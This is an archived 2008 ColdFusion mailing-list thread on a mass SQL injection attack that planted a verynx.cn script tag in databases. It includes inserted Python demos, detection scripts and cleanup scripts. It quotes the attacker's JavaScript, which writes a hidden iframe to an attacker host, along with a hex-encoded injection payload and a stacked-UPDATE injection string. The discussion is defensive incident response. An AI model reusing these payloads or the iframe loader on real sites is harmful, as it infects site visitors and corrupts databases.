notify the sender immediately and permanently destroy all copies of this
message and attachments.
On Mon, 2008-07-21 at 16:38 -0400, Claude Schneegans wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Heikki Heikkinen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309412
Brad,
This took care of part of the issue... but not all.
I get this error:
Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.
Does anyone know what I need to do to get around the error above?
thanks!
----- Excess quoted text cut - see Original Post for more -----
Author: Experienced CF Developer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309411
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Did I really just read that? Please, someone, anyone, tell me that I
didn't.
Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.
For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam. If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.
Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
> CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
> difficult to read,
> so the best is to use it only when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter is as stupid
> as never using it at all.
>
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309409
----- Excess quoted text cut - see Original Post for more -----
If you use it systematically for every parameter, you won't have any
"forgotten" pages. Besides, again, it provides benefits beyond validation,
such as potentially improving the reuse of execution plans.
Dave Watts, CTO, Fig Leaf Software
Author: Matt Quackenbush
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309408
Did I really just read that? Please, someone, anyone, tell me that I
didn't.
Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.
For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam. If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.
Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
> CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
> difficult to read,
> so the best is to use it only when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter is as stupid
> as never using it at all.
>
Author: Heikki Heikkinen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309407
Mark,
Thanks for the info. I tried this and it located the code. I removed the
comment and Executed however, the code still remains.
Any help you can offer would be great!
Thanks!
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309401
>>This appears to be a botnet-driven attack. Blocking addresses may be
problematic in that case.
Why do you all want to interpret this as a final solution?
Blocking an IP will NOT block ANY attack, it will just stop the current
attack from THIS address, period.
But it is safer than letting the malbot try every page it can find,...
until it does find one in which CFQUERYPARAM was forgotten.
>>If you're using CFQUERYPARAM as well, this doesn't really add any
protection
to the database. If you're not, the protection it does add is far from
complete. Again, that's really my concern with your proposal.
I use this method ONLY in the case an url.variable is supposed to
contain an integer value.
And in THAT CASE only, and for that variable only, the CFQUERYPARAM is
useless, because if the variable contains anything else than a numeric,
the query will never get executed anyway.
CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
difficult to read, so the best is to use it only when it is really necessary.
For me, using CFQUERYPARAM systematically for every parameter is as stupid
as never using it at all.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309398
>>.....and all hackers ALWAYS use the same IP....cause they'd never get
>>caught that way...hehe
>>yes...that was meant to be sarcastic
It does not look sarcastic to me, just maybe a little retarded ;-)
>>I see where you're coming from Claude, I just think (as Dave appears to)
that you're wasting your time....
I'm not wasting my time, I'm saving my server time.
At a certain time I used to have many errors in the "server too busy" or
"memory error" category.
I also discovered that a huge amount of the traffic on my server was due
to robots, so I decided to control more specifically this traffic.
I first optimized the "good robots" like Google, Yahoo, MSN etc using
pertinent <meta name="revisit-after" content="n Days"> tags and other
tricks.
And I also tracked bad bots and fake browsers.
Just look at your logs, and you'll be amazed by the amount of traffic
caused by
- browsers that never request images, probably bots...
- "experimental robots" (I don't care if students experiment with things, I
just don't want to be the guinea pig)
- robots that do not embed an address to explain why they are searching
your sites,
- robots that read all images to detect if one of them is copyrighted
and illegally used (huge traffic)
- Chinese robots that check if your site should be banned from China
because it talks about human rights,
- AND also spammers and hackers of course,
... etc.
So I designed my own robot detection tools, and spam or SQL injection
attempts are only extra tools I use to classify robots and just a drop in
the ocean of sh%$/? I'm getting away. ;-)
... and yes, my server is much more stable now.
and also, the statistics I show to my customers are realistic.
Of course, I also use CFQUERYPARAM as an ultimate protection.
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309396
Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309397
> What other ways are there? I know of two: EXEC and EXECUTE.
Some people already mentioned sp_executesql, which is the preferred approach
nowadays. But what about Unicode character conversion? What about from the
shell using sp_cmdshell to fetch batch files remotely and execute them with
isql/osql? For all I know, there may be other approaches as well.
Dave Watts, CTO, Fig Leaf Software
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309395
> Not from the same address though, because it is banned now.
This appears to be a botnet-driven attack. Blocking addresses may be
problematic in that case.
> And the purpose of my code is not to replace CFQUERYPARAM.
That's fine. My concern isn't really with you, Claude, but with people who
might read your remarks and think that what you're doing is a valid
substitute for CFQUERYPARAM - because it's not.
> It is to add an extra feature that will not only protect the
> database, but ALSO the whole site, because the guy won't be
> able to open any other page.
If you're using CFQUERYPARAM as well, this doesn't really add any protection
to the database. If you're not, the protection it does add is far from
complete. Again, that's really my concern with your proposal.
> > Figuring out what patterns to deny is a losing battle.
>
> Look at what <CFQUERYPARAM CFSQLType = "CF_SQL_INTEGER "... does:
> It triggers an error if the parameter is not an integer.
> My code does exactly the same thing, PLUS it bans the
> intruder in case some known attack pattern is detected.
On its face, your comparison seems valid. But that's not really what
CFQUERYPARAM does. Or at least, it's an incomplete description.
What it does is separate data from executable code. This mechanism prevents
data from being executed as code. The specific type of data is really
invalid, and it'll work with any data now and in the future. It's as close
to a foolproof mechanism as you're going to find. While it does validate
specific data types, its real power is in this separation of data from code.
Dave Watts, CTO, Fig Leaf Software
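The separation Dave describes, shown as an added example (not code from the thread, from ColdFusion, or from any poster): a Python sqlite3 stand-in for SQL Server, with the injected tag taken from the posts above and a constructed two-row articles table. `search_unsafe` splices the parameter into the statement text and runs it as a script, so the stacked UPDATE in `hostile_value` appends the tag to every row; `search_safe` binds the same string, as cfqueryparam does, and it is merely compared with the title column. `article_checked` is the integer check Claude argues for, which is sound for an integer parameter but has no counterpart for the free-text search term.

```python
import sqlite3

# The tag the thread's attack appended to varchar columns (taken from the posts above).
INJECTED_TAG = '</title><script src="http://1.verynx.cn/w.js"></script>'


def fresh_db():
    """Constructed demo schema; sqlite3 stands in for SQL Server here."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'Hello world');
        INSERT INTO articles VALUES (2, 'News', 'Nothing to report');
    """)
    return db


def hostile_value(prefix="1"):
    """What the bot sends where a plain value is expected: close the string
    literal, stack an UPDATE that appends the tag to a text column, and comment
    out whatever SQL followed."""
    return prefix + "'; UPDATE articles SET body = body || '" + INJECTED_TAG + "'; --"


def infected_rows(db):
    """Rows whose body carries the tag (the value is bound, never concatenated)."""
    return db.execute("SELECT COUNT(*) FROM articles WHERE body LIKE ?",
                      ("%" + INJECTED_TAG + "%",)).fetchone()[0]


def search_unsafe(db, term):
    """Concatenation: the parameter is spliced into the statement text, so the
    database cannot tell where the query ends and the attacker's SQL begins.
    executescript() runs stacked statements, as SQL Server does."""
    db.executescript("SELECT id FROM articles WHERE title = '" + term + "';")


def search_safe(db, term):
    """Bound parameter, which is what cfqueryparam sends: statement text and
    value travel separately, so the value is only ever compared with title
    and can never become code, whatever it contains."""
    return db.execute("SELECT id FROM articles WHERE title = ?", (term,)).fetchall()


def article_checked(db, article_id):
    """The integer check argued for in the thread: refuse anything that is not
    a positive integer before any SQL runs. Sound for this one parameter, but
    a free-text parameter such as the search term has no such check."""
    if not str(article_id).isdigit():
        raise ValueError("article id must be a positive integer")
    return db.execute("SELECT title FROM articles WHERE id = " + str(article_id)).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    search_unsafe(db, hostile_value("News"))
    print("rows carrying the tag after the concatenated query:", infected_rows(db))  # 2

    db = fresh_db()
    print("rows returned by the bound query:", search_safe(db, hostile_value("News")))  # []
    print("rows carrying the tag after the bound query:", infected_rows(db))  # 0
```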
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309394
> Yeah, that sucks, I was going to dissect it. It appears that
> DNS is resolving it to 127.0.0.1. I didn't know you could do
> that. verynx.cn resolves to 121.12.169.186, but it returns a
> 404 when I submit a GET for w.js.
Here's a sample, from another .js file used:
window.status="";
// Skip visitors whose browser language is Chinese, Urdu, Russian, Korean, Hindi, Thai or Vietnamese
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
  // Fire at most once per nine hours per browser, tracked with a "dssndd" cookie
  var cookieString = document.cookie;
  var start = cookieString.indexOf("dssndd=");
  if (start != -1){}else{
    var expires = new Date();
    expires.setTime(expires.getTime()+9*3600*1000);
    document.cookie = "dssndd=update;expires="+expires.toGMTString();
    // Write a zero-size iframe that pulls the next stage from the attacker's server
    try{
      document.write("<iframe src=http://lodse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    }
    catch(e)
    {
    };
  }}
The URL in the iframe appears to simply redirect to msn.com. So, it looks
like the purpose of the attack is click-fraud.
Dave Watts, CTO, Fig Leaf Software
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309393
I can confirm that many templates in our site are being hit. And they
are not commonly named.
-KJ
> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are being
> hit? Perhaps only 'commonly named' templates are being
hit?
Author: Cameron Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309391
We got hit, and, according to the IIS logs, they hit non-standard templates in
varied directories:
/indexPrint.cfm
/events/institute.cfm
/search/TaxonomyResults.cfm
/conferences/article.cfm
/applications/statsmap/detail.cfm
I don't see much of a pattern.
Cameron
>For me, all attempts are focusing on rss.cfm. Another post said they saw
>sitemap.cfm being hit. Can anyone confirm any other templates that are being
>hit? Perhaps only 'commonly named' templates are being hit?
>
>Che
Author: Mark Atkinson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309387
We've been dealing with these too - to address Che's question they were
crawling here for pages with query strings but not much else - as well
as our implementing solutions offered here (much appreciation to all),
our net. admin. simply shut down these attacks at the firewall -
Sonicwall is the name of our firewall and it apparently updates every
ten minutes to include defenses against things like this. Our logs are
very clean now - although DB's a mess. :-) N.A. left for the day before
I got back to email but I will attempt to discover what he did and post
here.
HTH
Mark
Che Vilnonis wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309388
The attempts are based on a google search of .cfm files with parameters that
can be exploited.
(They have automated the page search, as well as the attack itself.)
It is not a cf specific attack, but is also nailing php, asp, and .net
sites.
Here is a decent writeup of it all.
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are
> being
> hit? Perhaps only 'commonly named' templates are being hit?
>
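Added example, not from the thread or from the linked write-up: a Python scan over constructed IIS-style log lines that does two things the thread discusses. It applies a keyword list like the one Dan proposes for the firewall, and where it finds a CAST(0x...) literal it decodes the hex back to the SQL that would have run, using the literal quoted at the top of the thread (the `AS CHAR(4000));EXEC(@S);--` tail of that truncated request is an assumption). Bytes cast to NCHAR/NVARCHAR are decoded as UTF-16LE, the Unicode variant Dave alludes to. The third sample line is a legitimate search containing the word "execute", the false positive Brad warns about: the keyword list flags it, the decoder does not.

```python
import binascii
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines, not taken from anyone's logs in the thread. The
# second carries the hex literal quoted at the top of the thread; the
# "AS CHAR(4000));EXEC(@S);--" tail is an assumption about how that truncated
# request continued. The third is a legitimate search that a keyword blocklist
# would catch.
SAMPLE_LOG_LINES = [
    "2008-07-21 14:02:11 GET /rss.cfm?id=17 200",
    "2008-07-21 14:02:12 GET /rss.cfm?id=17';DECLARE+@S+CHAR(4000);SET+@S=CAST("
    "0x4445434C415245204054207661726368617228323535292C404320766172636861"
    "+AS+CHAR(4000));EXEC(@S);-- 500",
    "2008-07-21 14:05:40 GET /search.cfm?q=how+to+execute+a+stored+procedure 200",
]

# A hex literal cast to a character type. Cast to NCHAR/NVARCHAR the bytes are
# UTF-16LE (SQL Server's Unicode encoding); cast to CHAR/VARCHAR they are
# single-byte text.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR|N?CHAR)", re.IGNORECASE)
# The tokens a blocklist like the one proposed in the thread keys on.
KEYWORDS = re.compile(r"\b(DECLARE|CAST|EXEC|EXECUTE|sp_executesql)\b", re.IGNORECASE)


def decode_hex_payload(hexdigits, unicode_cast=False):
    """Turn the 0x... literal back into the SQL text the server would have run."""
    if len(hexdigits) % 2:
        hexdigits = "0" + hexdigits  # pad an odd-length literal so unhexlify accepts it
    raw = binascii.unhexlify(hexdigits)
    return raw.decode("utf-16-le", "replace") if unicode_cast else raw.decode("latin-1")


def analyse_request(line):
    """Return None for a clean log line, else what was found in its query string."""
    target = next((field for field in line.split() if "?" in field), None)
    if target is None:
        return None
    parts = urlsplit(target)
    query = unquote_plus(parts.query)
    keywords = sorted({m.group(1).upper() for m in KEYWORDS.finditer(query)})
    decoded = [decode_hex_payload(hexdigits, ctype.upper().startswith("N"))
               for hexdigits, ctype in HEX_CAST.findall(query)]
    if not keywords and not decoded:
        return None
    return {"path": parts.path, "keywords": keywords, "decoded": decoded}


def scan_log(lines):
    """Findings for every line that trips the keyword list or carries a hex payload."""
    return [finding for finding in map(analyse_request, lines) if finding]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        verdict = "injection" if hit["decoded"] else "keyword only, check by hand"
        print(hit["path"], hit["keywords"], verdict)
        for sql in hit["decoded"]:
            print("   decoded payload:", sql)
```

The decoded text is what to grep the rest of the log for, and what tells you which tables the bot went after; the keyword hit on its own is only a reason to look, not a reason to ban.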
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309386
I have all of the js files open and saved to a text file, fwiw, from this
morning.
On Mon, Jul 21, 2008 at 3:24 PM, Claude Schneegans <
schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309385
Easy. sp_executesql
The point here is, you can spend a lifetime guessing every bad way a
hacker can ruin your database. The root cause however is that your
input is not bound to a parameter in your SQL statement. Cfqueryparam
closes that hole for good. Whether you want to ban people's IPs and
junk is up to you, but that can be a slippery slope when you start
banning legit people because they typed the word "execute" into a
comments form.
~Brad
I'm just talking about executing SQL, not SQL injection methods.
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309384
For me, all attempts are focusing on rss.cfm. Another post said they saw
sitemap.cfm being hit. Can anyone confirm any other templates that are being
hit? Perhaps only 'commonly named' templates are being hit?
Che
Author: Bryan Stevenson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309383
....and all hackers ALWAYS use the same IP....cause they'd never get
caught that way...hehe
yes...that was meant to be sarcastic ;-)
I see where you're coming from Claude, I just think (as Dave appears to)
that you're wasting your time....let CFQUERYPARAM do what it's meant to.
Cheers
-
Bryan Stevenson B.Comm.
On Mon, 2008-07-21 at 15:39 -0400, Claude Schneegans wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309381
I'm just talking about executing SQL, not SQL injection methods.
>>What other ways are there? I know of two: EXEC and EXECUTE
"http" (http injection) and "user" (SQL injection) are classics.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309379
And embedded in his code is one of the "other" ways of executing SQL - using
sp_executeSQL .... His script is better than mine I think.
Mark A. Kruger, CFG, MCSE
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
-- Records every (table, column) pair in which the injected tag was found.
CREATE TABLE [dbo].[Infected](
    [TableName]  [varchar](255)  NULL,
    [ColumnName] [varchar](4000) NULL
);

DECLARE @T   nvarchar(255)
DECLARE @C   nvarchar(4000)
DECLARE @SQL nvarchar(4000)

-- Every character-typed column of every user table:
-- xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id
      AND a.xtype = 'u'
      AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE @@fetch_status = 0
BEGIN
    -- Look for the injected tag in this column. QUOTENAME brackets the
    -- table and column names so names with spaces or reserved words still work.
    SET @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; '
             + 'SELECT TOP 1 @V = ' + QUOTENAME(@C) + ' FROM ' + QUOTENAME(@T)
             + ' WHERE ' + QUOTENAME(@C) + ' LIKE ''%</title><script src="http://1.verynx.cn/w.js">%''; '
             + 'IF (@V IS NOT NULL) BEGIN INSERT INTO dbo.Infected (TableName, ColumnName) '
             + 'VALUES (''' + @T + ''',''' + @C + ''') END'
    PRINT @SQL
    EXECUTE sp_executesql @SQL
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.
~Brad
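Added example, not the thread's script or Ryan Cooper's: the clean-up Brad recommends, written in Python against sqlite3 as a stand-in for SQL Server, with a constructed two-table database. `text_columns` plays the role of the sysobjects/syscolumns join above (the type-name hints it matches on are an assumption), `find_infected` is the detection pass, and `clean_infected` strips the tag with REPLACE, binding the tag as a value and quoting table and column names, since identifiers cannot be bound.

```python
import sqlite3

# The tag the bot appended, and that the Infected-table script above searches for.
INJECTED_TAG = '</title><script src="http://1.verynx.cn/w.js"></script>'

# Assumption: a column whose declared type contains one of these words holds text.
# On SQL Server the same selection is the syscolumns xtype filter in the script above.
TEXT_TYPE_HINTS = ("CHAR", "TEXT", "CLOB")


def quote_ident(name):
    """Identifiers cannot be bound as parameters, so they are quoted instead."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(db):
    """Yield (table, column) for every text-typed column in every user table."""
    tables = [row[0] for row in db.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_rest in db.execute("PRAGMA table_info(%s)" % quote_ident(table)):
            if any(hint in ctype.upper() for hint in TEXT_TYPE_HINTS):
                yield table, name


def find_infected(db, marker=INJECTED_TAG):
    """Map (table, column) -> number of rows whose value contains the marker."""
    found = {}
    for table, column in text_columns(db):
        count = db.execute(
            "SELECT COUNT(*) FROM %s WHERE %s LIKE ?" % (quote_ident(table), quote_ident(column)),
            ("%" + marker + "%",)).fetchone()[0]
        if count:
            found[(table, column)] = count
    return found


def clean_infected(db, marker=INJECTED_TAG):
    """Remove the marker from every affected row; returns the number of rows changed."""
    changed = 0
    for table, column in find_infected(db, marker):
        t, c = quote_ident(table), quote_ident(column)
        cur = db.execute(
            "UPDATE %s SET %s = REPLACE(%s, ?, '') WHERE %s LIKE ?" % (t, c, c, c),
            (marker, "%" + marker + "%"))
        changed += cur.rowcount
    db.commit()
    return changed


def sample_db():
    """Constructed demo database: four text values carry the appended tag;
    the integer column and one text column are clean."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title VARCHAR(255), body TEXT, views INTEGER);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author VARCHAR(100), message NTEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'Hello world', 10);
        INSERT INTO articles VALUES (2, 'News', 'Nothing to report', 3);
        INSERT INTO comments VALUES (1, 'che', 'Nice site');
    """)
    db.execute("UPDATE articles SET title = title || ? WHERE id = 2", (INJECTED_TAG,))
    db.execute("UPDATE articles SET body = body || ?", (INJECTED_TAG,))
    db.execute("UPDATE comments SET message = message || ?", (INJECTED_TAG,))
    db.commit()
    return db


if __name__ == "__main__":
    db = sample_db()
    print("before:", find_infected(db))
    print("rows cleaned:", clean_infected(db))
    print("after:", find_infected(db))
```

Two caveats for running the same idea on SQL Server: REPLACE does not accept text or ntext arguments (xtype 35 and 99 in the script above), so those columns need a CAST to varchar(max) or nvarchar(max) first; and a restore from a backup taken before the first hit is cleaner than an in-place REPLACE, which removes only the one marker you searched for.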
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309380
>>What other ways are there? I know of two: EXEC and EXECUTE
"http" (http injection) and "user" (SQL injection) are classics.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309377
Brad/dave,
Back when it was working the script did little more than insert a link into
the page that sent the user to a targeted "links" site/page... In other words
it was a basic spam traffic generator - at least the ones on our sites.
-mark
Mark A. Kruger, CFG, MCSE
For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
===============
Yeah, that sucks, I was going to dissect it. It appears that DNS is
resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.
Hmm, some off-shore joint. "Asia Pacific Network Information Centre"
owns the IP the domain resolves to. Shows up as possibly being in Beijing,
China.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309378
>>That's fine, until the attack pattern contains something else, like
Unicode
sequences.
Not from the same address though, because it is banned now.
And the purpose of my code is not to replace CFQUERYPARAM.
It is to add an extra feature that will not only protect the database,
but ALSO
the whole site, because the guy won't be able to open any other page.
>>Figuring out what patterns to deny is a losing battle.
Look at what <CFQUERYPARAM CFSQLType="CF_SQL_INTEGER" ...> does:
It triggers an error if the parameter is not an integer.
My code does exactly the same thing, PLUS it bans the intruder in case
some known attack pattern is detected.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309375
I took the time to save out all of the code from the JS file that was
inserted.
Anyone that would like this code, please contact me off list and I'll be
happy to zip it up for you.
>>For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The
server name
doesn't resolve.
===============
Yeah, that sucks, I was going to dissect it.
It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing an
iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309376
We're getting hit with this attack via a wide range of hosted domains, and
various files. Sitemap.cfm is a common one at this point.
andy
>>We're getting hit hard today with this.
>>/rss.cfm?
Is it just rss.cfm? I haven't looked at our logs yet. Where did you see
this? The server log files?
~~G~~
> We're getting hit hard today with this. They're failing, because we
> use cfqueryparam and cfprocparam. But it is quite annoying.
>
> -KJ
>
>
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309374
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
-- Records every (table, column) pair that still holds the injected string.
CREATE TABLE [dbo].[Infected](
    [TableName]  [varchar](255)  NULL,
    [ColumnName] [varchar](4000) NULL
);
DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)
-- Same cursor the attack used: every user table and every text/ntext/nvarchar/varchar
-- column (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar).
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id
      AND a.xtype = 'u'
      AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are bracketed so names with spaces or reserved words do not
    -- break the dynamic SQL; the LIKE pattern is kept on one line so that no
    -- line break from mail wrapping ends up inside the string literal.
    SET @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; '
        + 'SELECT TOP 1 @V = [' + @C + '] FROM [' + @T + '] '
        + 'WHERE [' + @C + '] LIKE ''%</title><script src="http://1.verynx.cn/w.js">%''; '
        + 'IF (@V IS NOT NULL) BEGIN INSERT INTO dbo.Infected (TableName, ColumnName) '
        + 'VALUES (''' + @T + ''',''' + @C + ''') END'
    PRINT @SQL
    EXECUTE sp_executesql @SQL
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an ActiveX
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the meantime, shut your site down so you don't infect your customers.
~Brad
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309373
Dave...
What other ways are there? I know of two: EXEC and EXECUTE.
----- Excess quoted text cut - see Original Post for more -----
That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309372
For those of you who have been hit by this attack and who need to try
something short of restoring your DB, this script will generate a series of
update statements in reverse of the hack that's been going around:
-----------------------------------------------------------
DECLARE @T varchar(255), @C varchar(255)
DECLARE @sql varchar(4000)
DECLARE @script varchar(255)
/* Fill in the exact string the attack appended to your columns. */
SELECT @script = '<script src="*scriptsrc"></script><!---'
-- Same cursor the attack used: every user table and every text/ntext/nvarchar/varchar
-- column (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar).
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u'
      AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    /* One UPDATE per column, stripping @script out of every row.
       Note: REPLACE() does not accept text/ntext arguments, so the generated
       statement for xtype 99/35 columns will fail unless the column is cast
       (e.g. CAST([col] AS varchar(8000))) first; check the printed output. */
    SELECT @sql = 'update [' + @T + '] set [' + @C + '] = Replace([' + @C + '],''' + @script + ''','''')'
    PRINT @sql
    /* Uncomment this after checking the output using PRINT. */
    --EXEC(@sql)
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
